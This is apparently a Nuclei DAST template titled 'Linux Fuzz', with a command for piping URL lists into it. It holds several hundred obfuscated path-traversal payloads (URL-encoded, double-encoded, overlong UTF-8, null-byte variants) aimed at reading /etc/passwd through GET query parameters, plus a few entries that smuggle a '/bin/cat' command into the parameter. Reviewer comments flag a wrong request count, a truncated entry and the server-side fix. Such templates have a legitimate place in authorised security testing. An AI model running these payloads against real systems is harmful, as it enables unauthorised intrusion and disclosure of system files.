Linux Fuzz
Improved version of the template from DAST, with additional obfuscated payloads. Run with: `cat urls.txt | gf lfi | nuclei -t linux.yaml -dast`
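# Nuclei DAST template: substitutes path-traversal variants of /etc/passwd
# into the query parameters of GET requests and reports a finding when the
# response body contains a passwd-style root entry.
id: linux-lfi-fuzz

info:
  name: Local File Inclusion - Linux
  author: Redflare
  severity: high
  reference:
    - https://github.com/coffinsp
  metadata:
    # NOTE(review): this value is far below the number of entries in the
    # nix_fuzz payload list of this template (several hundred), so it
    # understates the request volume per fuzzed URL. Recompute it before
    # using it for rate or scope planning.
    max-request: 5
  tags: lfi,dast,linux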
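http:
  # Only requests whose method is GET are fuzzed.
  - pre-condition:
      - type: dsl
        dsl:
          - 'method == "GET"'

    payloads:
      # Every entry targets /etc/passwd; the variants differ only in how the
      # traversal sequence and path separators are encoded (plain,
      # URL-encoded, double-encoded, overlong UTF-8, %u-style, null-byte and
      # suffix forms). Single quotes keep backslashes and percent signs
      # literal. On the server side the durable fix is to canonicalize the
      # path once and check it against an allowed base directory, not to
      # filter individual encodings.
      nix_fuzz:
        - '/etc/passwd'
        - '%00/etc/passwd'
        - '%00../../../../../../etc/passwd'
        - '%00/etc/passwd%00'
        - '..%01%25c1%259cetc%25c1%259cpasswd'
        - '..%01%%32%%66etc%%32%%66passwd'
        - '..%01%c0%afetc%c0%afpasswd'
        - '..%01%e0%80%afetc%e0%80%afpasswd'
        - '..%01%u2215..%01%u2215etc%u2215passwd'
        - '..%01%u2216etc%u2216passwd'
        - '..%01%uEFC8etc%uEFC8passwd'
        - '%0a/bin/cat%20/etc/passwd'
        - '0x2e0x2e/0x2e0x2e/etc/passwd'
        - '0x2e0x2e0x2fetc0x2fpasswd'
        - '0x2e0x2e0x5cetc0x5cpasswd'
        - '0x2e0x2e%25c0%25afetc%25c0%25afpasswd'
        - '0x2e0x2e%25c1%259cetc%25c1%259cpasswd'
        - '0x2e0x2e%2fetc%2fpasswd'
        - '0x2e0x2e%%32%%66etc%%32%%66passwd'
        - '0x2e0x2e%%35%%63etc%%35%%63passwd'
        - '0x2e0x2e%5cetc%5cpasswd'
        - '0x2e0x2e%bg%qfetc%bg%qfpasswd'
        - '0x2e0x2e%c0%2fetc%c0%2fpasswd'
        - '0x2e0x2e%c0%5cetc%c0%5cpasswd'
        - '0x2e0x2e%c0%9vetc%c0%9vpasswd'
        - '0x2e0x2e%c0%afetc%c0%afpasswd'
        - '0x2e0x2e%c0%qfetc%c0%qfpasswd'
        - '0x2e0x2e%c1%1cetc%c1%1cpasswd'
        - '0x2e0x2e%c1%8setc%c1%8spasswd'
        - '0x2e0x2e%c1%9cetc%c1%9cpasswd'
        - '0x2e0x2e%c1%afetc%c1%afpasswd'
        - '0x2e0x2e%c1%pcetc%c1%pcpasswd'
        - '0x2e0x2e%e0%80%afetc%e0%80%afpasswd'
        - '0x2e0x2e/etc/passwd'
        - '0x2e0x2e%f0%80%80%afetc%f0%80%80%afpasswd'
        - '0x2e0x2e%f8%80%80%80%afetc%f8%80%80%80%afpasswd'
        - '0x2e0x2e%u22150x2e0x2e%u2215/etc/passwd'
        - '0x2e0x2e%u2215/etc/passwd'
        - '0x2e0x2e%u2215etc%u2215passwd'
        - '0x2e0x2e%u2216/etc/passwd'
        - '0x2e0x2e%u2216etc%u2216passwd'
        - '0x2e0x2e%uEFC80x2e0x2e%uEFC8/etc/passwd'
        - '0x2e0x2e%uEFC8/etc/passwd'
        - '0x2e0x2e%uEFC8etc%uEFC8passwd'
        - '0x2e0x2e%uF0250x2e0x2e%uF025/etc/passwd'
        - '0x2e0x2e%uF025/etc/passwd'
        - '0x2e0x2e%uF025etc%uF025passwd'
        - '....//0x2f..../0x2fetc0x2fpasswd'
        - '.?0x2fetc0x2fpasswd'
        - '....//0x5c..../0x5cetc0x5cpasswd'
        - '%252e%252e\%252e%252e\/etc/passwd'
        - '%252e%252e%252fetc%252fpasswd'
        - '%252e%252e%252fetc%252fpasswd%00'
        - '%252e%252e%252f/etc/passwd'
        - '%252e%252e%25c1%259c/etc%25c1%259cpasswd'
        - '%252e%252e%2fetc%2fpasswd'
        - '%252e%252e%5cetc%5cpasswd'
        - '%252e%252e%c0%2f%252e%252e%c0%2f%252e%252e%c0%2f%252e%252e%c0%2fetc%c0%2fpasswd'
        - '%252e%252e%c0%2f%252e%252e%c0%2f%252e%252e%c0%2fetc%c0%2fpasswd'
        - '%252e%252e%c0%2f%252e%252e%c0%2fetc%c0%2fpasswd'
        - '%252e%252e%c0%2fetc%c0%2fpasswd'
        - '%252e%252e%c0%af/etc%c0%afpasswd'
        - '%252e%252e%c1%9c/etc%c1%9cpasswd'
        - '%252e%252e//etc/passwd'
        - '%252e%252e/etc/passwd'
        - '..%252f..%252fetc%252fpasswd'
        - '....//%252f..../%252fetc%252fpasswd'
        - '.?%252fetc%252fpasswd'
        - '....//%255c..../%255cetc%255cpasswd'
        - '%25c0%25ae%25c0%25ae0x2fetc0x2fpasswd'
        - '%25c0%25ae%25c0%25ae0x5cetc0x5cpasswd'
        - '%25c0%25ae%25c0%25ae%252fetc%252fpasswd'
        - '%25c0%25ae%25c0%25ae%255cetc%255cpasswd'
        - '%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\/etc/passwd'
        - '%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\/etc/passwd'
        - '%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\/etc/passwd'
        - '%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\/etc/passwd'
        - '%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\/etc/passwd'
        - '%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\/etc/passwd'
        - '%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\/etc/passwd'
        - '%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c/etc/passwd'
        - '%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c/etc/passwd'
        - '%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c/etc/passwd'
        - '%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c/etc/passwd'
        - '%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c/etc/passwd'
        - '%25c0%25ae%25c0%25ae%25c1%259c/etc/passwd'
        - '%25c0%25ae%25c0%25ae%2fetc%2fpasswd'
        - '%25c0%25ae%25c0%25ae%5cetc%5cpasswd'
        - '%25c0%25ae%25c0%25ae%c0%2fetc%c0%2fpasswd'
        - '%25c0%25ae%25c0%25ae%c0%5cetc%c0%5cpasswd'
        - '%25c0%25ae%25c0%25ae%c0%afetc%c0%afpasswd'
        - '%25c0%25ae%25c0%25ae%c1%9cetc%c1%9cpasswd'
        - '%25c0%25ae%25c0%25ae%c1%9c/etc/passwd'
        - '%25c0%25ae%25c0%25ae%c1%pcetc%c1%pcpasswd'
        - '%25c0%25ae%25c0%25ae//etc/passwd'
        - '%25c0%25ae%25c0%25ae/etc/passwd'
        - '%25c0%25ae%25c0%25ae\/etc/passwd'
        - '%25c0%25ae%25c0%25ae\etc\passwd'
        - '....//%25c0%25af..../%25c0%25afetc%25c0%25afpasswd'
        - '%25c0%25af/etc/passwd'
        - '....//%25c1%259c..../%25c1%259cetc%25c1%259cpasswd'
        - '%25c1%259c/etc/passwd'
        - '%2e%2e%25c0%25afetc%25c0%25afpasswd'
        - '%2e%2e%25c1%259cetc%25c1%259cpasswd'
        - '/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
        - '%2e%2e/%2e%2e/%2e%2e//etc/passwd'
        - '%2e%2e/%2e%2e/etc/passwd'
        - '%2e%2e\%2e%2e\/etc/passwd'
        - '%2e%2e%2fetc%2fpasswd'
        - '%2e%2e%2f/etc/passwd'
        - '%2e%2e%%32%%66etc%%32%%66passwd'
        - '%2e%2e%%35%%63etc%%35%%63passwd'
        - '%2e%2e%5cetc%5cpasswd'
        - '%2e%2e%bg%qfetc%bg%qfpasswd'
        - '%2e%2e%c0%2fetc%c0%2fpasswd'
        - '%2e%2e%c0%5cetc%c0%5cpasswd'
        - '%2e%2e%c0%9vetc%c0%9vpasswd'
        - '%2e%2e%c0%afetc%c0%afpasswd'
        - '%2e%2e%c0%qfetc%c0%qfpasswd'
        - '%2e%2e%c1%1cetc%c1%1cpasswd'
        - '%2e%2e%c1%8setc%c1%8spasswd'
        - '%2e%2e%c1%9cetc%c1%9cpasswd'
        - '%2e%2e%c1%afetc%c1%afpasswd'
        - '%2e%2e%c1%pcetc%c1%pcpasswd'
        - '%2e%2e%e0%80%afetc%e0%80%afpasswd'
        - '%2e%2e//etc/passwd'
        - '%2e%2e/etc/passwd'
        - '%2e%2e%f0%80%80%afetc%f0%80%80%afpasswd'
        - '%2e%2e%f8%80%80%80%afetc%f8%80%80%80%afpasswd'
        - '%2e%2e%u2215etc%u2215passwd'
        - '%2e%2e%u2216etc%u2216passwd'
        - '%2e%2e%uEFC8etc%uEFC8passwd'
        - '%2e%2e%uF025etc%uF025passwd'
        - '%2e%c0%ae%2fetc%2fpasswd'
        - '%2e%c0%ae%5cetc%5cpasswd'
        - '.%2e/etc/passwd'
        - '..%2f..%2fetc%2fpasswd'
        - '....//%2f..../%2fetc%2fpasswd'
        - '..%2f..%2f/etc/passwd'
        - '%%32%%65%%32%%650x2fetc0x2fpasswd'
        - '%%32%%65%%32%%650x5cetc0x5cpasswd'
        - '%%32%%65%%32%%65%252fetc%252fpasswd'
        - '%%32%%65%%32%%65%255cetc%255cpasswd'
        - '%%32%%65%%32%%65%2fetc%2fpasswd'
        - '%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65//etc/passwd'
        - '%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65//etc/passwd'
        - '%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65//etc/passwd'
        - '%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65//etc/passwd'
        - '%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65//etc/passwd'
        - '%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65//etc/passwd'
        - '%%32%65%%32%65/%%32%65%%32%65//etc/passwd'
        # NOTE(review): the next entry starts with a stray backtick and stops
        # mid-sequence without a target path; it looks truncated. Confirm it
        # against the list it was copied from, or drop it.
        - '`%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%'
        - '%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66/etc/passwd'
        - '%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66/etc/passwd'
        - '%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66/etc/passwd'
        - '%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66/etc/passwd'
        - '%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66/etc/passwd'
        - '%%32%65%%32%65%%32%66/etc/passwd'
        - '%%32%%65%%32%%65%5cetc%5cpasswd'
        - '%%32%%65%%32%%65%bg%qfetc%bg%qfpasswd'
        - '%%32%%65%%32%%65%c0%2fetc%c0%2fpasswd'
        - '%%32%%65%%32%%65%c0%5cetc%c0%5cpasswd'
        - '%%32%%65%%32%%65%c0%afetc%c0%afpasswd'
        - '%%32%%65%%32%%65%c1%9cetc%c1%9cpasswd'
        - '%%32%%65%%32%%65/etc/passwd'
        - '%%32%%65%%32%%65\etc\passwd'
        - '%%32%65%%32%65//etc/passwd'
        - '%%32%%65%%32%%65%u2215etc%u2215passwd'
        - '%%32%%65%%32%%65%u2216etc%u2216passwd'
        - '%%32%%65%%32%%65%uEFC8etc%uEFC8passwd'
        - '%%32%%65%%32%%65%uF025etc%uF025passwd'
        - '..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66/etc/passwd'
        - '..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66/etc/passwd'
        - '..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66/etc/passwd'
        - '..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66/etc/passwd'
        - '..%%32%66..%%32%66..%%32%66..%%32%66/etc/passwd'
        - '..%%32%66..%%32%66..%%32%66/etc/passwd'
        - '....//%%32%%66..../%%32%%66etc%%32%%66passwd'
        - '..%%32%66..%%32%66/etc/passwd'
        - '%%32%%66/etc%%32%%66passwd'
        - '..%%32%66/etc/passwd'
        - '....//%%35%%63..../%%35%%63etc%%35%%63passwd'
        - '/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd'
        - '..%5c..%5cetc%5cpasswd'
        - '....//%5c..../%5cetc%5cpasswd'
        - '%5C../etc/passwd'
        - 'AAAAAAAA.../etc/passwd'
        - 'AAAAAAAA..\etc\passwd'
        # The embedded single quotes are doubled ('') so this scalar is valid
        # YAML; written with lone quotes the entry ends early and the
        # template fails to parse.
        - '\\''/bin/cat%20/etc/passwd\\'''
        - '....//%bg%qf..../%bg%qfetc%bg%qfpasswd'
        - '%c0%2e%c0%2e%2fetc%2fpasswd'
        - '%c0%2e%c0%2e/etc/passwd'
        - '....//%c0%2f..../%c0%2fetc%c0%2fpasswd'
        - '....//%c0%5c..../%c0%5cetc%c0%5cpasswd'
        - '....//%c0%9v..../%c0%9vetc%c0%9vpasswd'
        - '..%c0%ae%2fetc%2fpasswd'
        - '%c0%ae%c0%ae%5cetc%5cpasswd'
        - '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'
        - '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00'
        - '%c0%ae%c0%ae%c1%9c/etc/passwd'
        - '%c0%ae%c0%ae//etc/passwd'
        - '/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd'
        - '....//%c0%af..../%c0%afetc%c0%afpasswd'
        - '%c0%afetc%c0%afpasswd'
        - '%c0.%c0.%2fetc%2fpasswd'
        - '%c0.%c0.%5cetc%5cpasswd'
        - '%c0.%c0./etc/passwd'
        - '%c0.%c0.\etc\passwd'
        - '....//%c0%qf..../%c0%qfetc%c0%qfpasswd'
        - '....//%c1%1c..../%c1%1cetc%c1%1cpasswd'
        - '....//%c1%8s..../%c1%8setc%c1%8spasswd'
        - '....//%c1%9c..../%c1%9cetc%c1%9cpasswd'
        - '....//%c1%af..../%c1%afetc%c1%afpasswd'
        - '....//%c1%pc..../%c1%pcetc%c1%pcpasswd'
        - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
        - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
        - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
        - '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
        - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
        - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
        - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
        - '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
        - '%e0%80%ae%e0%80%ae0x2fetc0x2fpasswd'
        - '%e0%80%ae%e0%80%ae0x5cetc0x5cpasswd'
        - '%e0%80%ae%e0%80%ae%252fetc%252fpasswd'
        - '%e0%80%ae%e0%80%ae%255cetc%255cpasswd'
        - '%e0%80%ae%e0%80%ae%25c0%25afetc%25c0%25afpasswd'
        - '%e0%80%ae%e0%80%ae%25c1%259cetc%25c1%259cpasswd'
        - '%e0%80%ae%e0%80%ae%2fetc%2fpasswd'
        - '%e0%80%ae%e0%80%ae%%32%%66etc%%32%%66passwd'
        - '%e0%80%ae%e0%80%ae%%35%%63etc%%35%%63passwd'
        - '%e0%80%ae%e0%80%ae%5cetc%5cpasswd'
        - '%e0%80%ae%e0%80%ae%bg%qfetc%bg%qfpasswd'
        - '%e0%80%ae%e0%80%ae%c0%2fetc%c0%2fpasswd'
        - '%e0%80%ae%e0%80%ae%c0%5cetc%c0%5cpasswd'
        - '%e0%80%ae%e0%80%ae%c0%9vetc%c0%9vpasswd'
        - '%e0%80%ae%e0%80%ae%c0%afetc%c0%afpasswd'
        - '%e0%80%ae%e0%80%ae%c0%qfetc%c0%qfpasswd'
        - '%e0%80%ae%e0%80%ae%c1%1cetc%c1%1cpasswd'
        - '%e0%80%ae%e0%80%ae%c1%8setc%c1%8spasswd'
        - '%e0%80%ae%e0%80%ae%c1%9cetc%c1%9cpasswd'
        - '%e0%80%ae%e0%80%ae%c1%afetc%c1%afpasswd'
        - '%e0%80%ae%e0%80%ae%c1%pcetc%c1%pcpasswd'
        - '%e0%80%ae%e0%80%ae%e0%80%afetc%e0%80%afpasswd'
        - '%e0%80%ae%e0%80%ae/etc/passwd'
        - '%e0%80%ae%e0%80%ae\etc\passwd'
        - '%e0%80%ae%e0%80%ae%f0%80%80%afetc%f0%80%80%afpasswd'
        - '%e0%80%ae%e0%80%ae%f8%80%80%80%afetc%f8%80%80%80%afpasswd'
        - '%e0%80%ae%e0%80%ae%u2215etc%u2215passwd'
        - '%e0%80%ae%e0%80%ae%u2216etc%u2216passwd'
        - '%e0%80%ae%e0%80%ae%uEFC8etc%uEFC8passwd'
        - '%e0%80%ae%e0%80%ae%uF025etc%uF025passwd'
        - '....//%e0%80%af..../%e0%80%afetc%e0%80%afpasswd'
        - '..%e0%80%afetc%e0%80%afpasswd'
        - '%e0%80%af/etc/passwd'
        - '................................................................../etc/passwd'
        - '......///etc///passwd'
        - '....//....//etc//passwd'
        - '....//....//etc/passwd'
        - '....//etc//passwd'
        - '..../\..../\etc/\passwd'
        - '.../etc/passwd'
        - '...\etc\passwd'
        - '../../../../../../../../../../../../etc/passwd'
        - '../../../../../../../../../etc/passwd'
        - '../../../../../../../../etc/passwd'
        - '../../../../../../../etc/passwd'
        - '../../../../../../etc/passwd'
        - '../../../../../etc/passwd'
        - '../../../../etc/passwd'
        - '../../../etc/passwd'
        - '../../etc/passwd'
        - '..///////..////..//////etc/passwd'
        - '..///etc///passwd'
        - '..//etc//passwd'
        - '../\/etc/\/passwd'
        - '../\etc/\passwd'
        - '../etc/passwd'
        - '..\..\..\..\..\..\..\..\..\..\etc\passwd'
        - '..\..\..\..\..\..\etc\passwd'
        - '..\..\etc\passwd'
        - '..\/\etc\/\passwd'
        - '..\/etc\/passwd'
        - '..\\\etc\\\passwd'
        - '..\\etc\\passwd'
        - './../etc/passwd'
        - '././././././././etc/passwd'
        - './/..//etc//passwd'
        - '.?/etc/passwd'
        - '.\..\etc\passwd'
        - '.\.\.\.\.\.\.\.\.\.\etc\passwd'
        - '.\\..\\etc\\passwd'
        - '.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd'
        - '/../../../../../../../../../../etc/passwd'
        - '/../../../../../../../../../../etc/passwd^^'
        - '/../../../../etc/passwd'
        - '/..\../..\../..\../..\../..\../..\../etc/passwd'
        - '/..\etc\passwd'
        - '/./././././././././././etc/passwd'
        - '///../etc///passwd'
        # Duplicate of the first entry in this list; it only costs one
        # redundant request.
        - '/etc/passwd'
        - '\../\../etc/\passwd'
        - '\../etc\passwd'
        - '\..\..\..\..\..\..\..\..\..\..\etc\passwd'
        - '\\\../../etc\\\passwd'
        - '\\\../etc\\\passwd'
        - 'etc/passwd'
        - '../../../../../../../../../../../../etc/passwd%00'
        - '../../../etc/passwd%00'
        - '../../etc/passwd%00'
        - '../etc/passwd%00'
        - '..\..\..\..\..\..\..\..\..\..\etc\passwd%00'
        - '..\etc\passwd%00'
        - '\..\..\..\..\..\..\..\..\..\..\etc\passwd%00'
        - '/../../../../../../../../../../../etc/passwd%00.html'
        - '/../../../../../../../../../../../etc/passwd%00.jpg'
        - '../../etc/passwd;index.html'
        - '../etc/passwd;index.html'
        - '%f0%80%80%afetc%f0%80%80%afpasswd'
        - '%f0%80%80%af/etc/passwd'
        - '....//%f0%80%80%af..../%f0%80%80%afetc%f0%80%80%afpasswd'
        - '%f8%80%80%80%af/etc/passwd'
        - '....//%f8%80%80%80%af..../%f8%80%80%80%afetc%f8%80%80%80%afpasswd'
        - '%u2215/etc/passwd'
        - '....//%u2215..../%u2215etc%u2215passwd'
        - '%u2216/etc/passwd'
        - '..%u2216..%u2216etc%u2216passwd'
        - '....//%u2216..../%u2216etc%u2216passwd'
        - '%uEFC8/etc/passwd'
        - '....//%uEFC8..../%uEFC8etc%uEFC8passwd'
        - '%uF025/etc/passwd'
        - '....//%uF025..../%uF025etc%uF025passwd'
        - '%uff0e%uff0e%25c0%25afetc%25c0%25afpasswd'
        - '%uff0e%uff0e%25c1%259cetc%25c1%259cpasswd'
        - '%uff0e%uff0e%%32%%66etc%%32%%66passwd'
        - '%uff0e%uff0e%%35%%63etc%%35%%63passwd'
        - '%uff0e%uff0e%e0%80%afetc%e0%80%afpasswd'
        - '%uff0e%uff0e%f0%80%80%afetc%f0%80%80%afpasswd'
        - '%uff0e%uff0e%f8%80%80%80%afetc%f8%80%80%80%afpasswd'
        - '%uff0e%uff0e%uF025etc%uF025passwd'

    fuzzing:
      - part: query
        type: replace  # the existing parameter value is replaced by the payload
        mode: multiple  # all query parameters are replaced in the same request
        fuzz:
          - '{{nix_fuzz}}'

    # Stop sending payloads for a target once one response has matched.
    stop-at-first-match: true
    matchers:
      # Matches a passwd-style root entry (root:<anything>:0:0:). The check
      # looks at the body only, so a page that legitimately prints such a
      # line (documentation, a paste) also matches; confirm a finding by
      # comparing against the unfuzzed response.
      - type: regex
        part: body
        regex:
          - 'root:.*:0:0:'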